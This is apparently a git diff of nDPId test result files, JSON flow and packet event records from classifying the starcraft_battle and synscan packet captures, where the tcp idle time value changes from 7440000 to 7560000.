+00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1437389982269,"flow_last_seen":1437389982443,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":463,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3519,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389983663,"flow_last_seen":1437389983964,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":515,"flow_tot_l4_payload_len":654,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3521,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1437389983788,"flow_last_seen":1437389983963,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":2996,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3522,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389985308,"flow_last_seen":1437389985615,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":491,"flow_tot_l4_payload_len":638,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3523,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1437389985320,"flow_last_seen":1437389985635,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":499,"flow_tot_l4_payload_len":644,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3524,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1437389985434,"flow_last_seen":1437389985610,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3255,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3525,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1437389985446,"flow_last_seen":1437389985631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3062,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.40","src_port":3526,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437389955670,"flow_last_seen":1437389984611,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"173.194.40.22","dst_ip":"192.168.1.100","src_port":443,"dst_port":53568,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1437389955670,"flow_last_seen":1437389984611,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"173.194.40.22","dst_ip":"192.168.1.100","src_port":443,"dst_port":53568,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389982769,"flow_last_seen":1437389982823,"flow_idle_time":180000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"5.42.180.154","src_port":53146,"dst_port":1119,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Starcraft","breed":"Fun","category":"Game"}} 00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1437389982769,"flow_last_seen":1437389982823,"flow_idle_time":180000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"5.42.180.154","src_port":53146,"dst_port":1119,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"199.38.164.156","src_port":3486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968610,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"199.38.164.156","src_port":3486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968610,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"199.38.164.156","src_port":3486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389968487,"flow_last_seen":1437389968610,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"199.38.164.156","src_port":3486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1437389963466,"flow_last_seen":1437389963469,"flow_idle_time":180000,"flow_min_l4_payload_len":372,"flow_max_l4_payload_len":452,"flow_tot_l4_payload_len":4522,"flow_avg_l4_payload_len":411,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.254","dst_ip":"239.255.255.250","src_port":38605,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00945{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":179,"flow_first_seen":1437389964790,"flow_last_seen":1437389968014,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":124502,"flow_avg_l4_payload_len":695,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"87.248.221.254","src_port":3508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}} -00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389954123,"flow_last_seen":1437389954123,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"80.239.186.26","dst_ip":"192.168.1.100","src_port":443,"dst_port":3476,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389954123,"flow_last_seen":1437389954123,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"80.239.186.26","dst_ip":"192.168.1.100","src_port":443,"dst_port":3476,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389955642,"flow_last_seen":1437389955642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"80.239.186.40","dst_ip":"192.168.1.100","src_port":443,"dst_port":3478,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389955642,"flow_last_seen":1437389955642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"80.239.186.40","dst_ip":"192.168.1.100","src_port":443,"dst_port":3478,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00945{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":179,"flow_first_seen":1437389964790,"flow_last_seen":1437389968014,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":124502,"flow_avg_l4_payload_len":695,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"87.248.221.254","src_port":3508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}} +00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389954123,"flow_last_seen":1437389954123,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"80.239.186.26","dst_ip":"192.168.1.100","src_port":443,"dst_port":3476,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389954123,"flow_last_seen":1437389954123,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"80.239.186.26","dst_ip":"192.168.1.100","src_port":443,"dst_port":3476,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389955642,"flow_last_seen":1437389955642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"80.239.186.40","dst_ip":"192.168.1.100","src_port":443,"dst_port":3478,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389955642,"flow_last_seen":1437389955642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"80.239.186.40","dst_ip":"192.168.1.100","src_port":443,"dst_port":3478,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389953741,"flow_last_seen":1437389953805,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58818,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389954543,"flow_last_seen":1437389954714,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58831,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1437389955747,"flow_last_seen":1437389955800,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58844,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1437389956550,"flow_last_seen":1437389956605,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":287,"flow_avg_l4_payload_len":71,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":58851,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00694{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1437389967432,"flow_last_seen":1437389968027,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"12.129.222.54","src_port":3512,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"}} +00694{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1437389967432,"flow_last_seen":1437389968027,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1437389985996,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"12.129.222.54","src_port":3512,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.WorldOfWarcraft","breed":"Fun","category":"Game"}} 00573{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":800,"source":"starcraft_battle.pcap","alias":"nDPId-test","packets-captured":800,"packets-processed":797,"total-skipped-flows":0,"total-l4-data-len":316668,"total-not-detected-flows":0,"total-guessed-flows":22,"total-detected-flows":30,"total-detection-updates":12,"total-updates":0,"current-active-flows":0,"total-active-flows":52,"total-idle-flows":52,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":315,"global_ts_msec":1437389985996} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 800/797 diff --git a/test/results/synscan.pcap.out b/test/results/synscan.pcap.out index 7e5809037..ea9c358d7 100644 --- a/test/results/synscan.pcap.out +++ b/test/results/synscan.pcap.out @@ -1,7992 +1,7992 @@ 00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"synscan.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"synscan.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1278275056274} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056274,"flow_last_seen":1278275056274,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056274,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1278275056274,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056274,"pkt":"ACYLMQczACWzv5HuCABFAAAs5wgAADYGK2qsEAAIQA2GNIzSAbvdUoMYAAAAAGACDAAq1AAAAgQFtA=="} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"synscan.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056276,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":143,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"synscan.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056276,"pkt":"ACYLMQczACWzv5HuCABFAAAsWtAAAC4Gv6KsEAAIQA2GNIzSAI\/dUoMYAAAAAGACDAAsAAAAAgQFtA=="} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"synscan.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056276,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"synscan.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056276,"pkt":"ACYLMQczACWzv5HuCABFAAAsxSoAAC0GVkisEAAIQA2GNIzSDOrdUoMYAAAAAGACCAAjpQAAAgQFtA=="} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"synscan.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056276,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":199,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"synscan.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275056276,"pkt":"ACYLMQczACWzv5HuCABFAAAsXg4AACoGwGSsEAAIQA2GNIzSAMfdUoMYAAAAAGACDAAryAAAAgQFtA=="} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"synscan.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275056276,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 